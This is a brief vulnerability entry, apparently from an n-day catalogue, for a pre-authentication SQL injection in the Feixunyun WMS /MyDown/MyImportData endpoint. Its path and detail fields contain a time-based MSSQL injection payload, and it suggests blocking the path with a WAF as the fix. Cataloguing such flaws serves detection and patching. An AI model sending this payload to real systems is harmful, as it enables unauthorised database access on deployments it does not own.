vendor = "飞讯云"
name = "飞讯云WMS /MyDown/MylmportData 前台SQL注入"
type = "SQL注入"
version = "未知"
path = "/MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN"
detail = "/MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "nday"
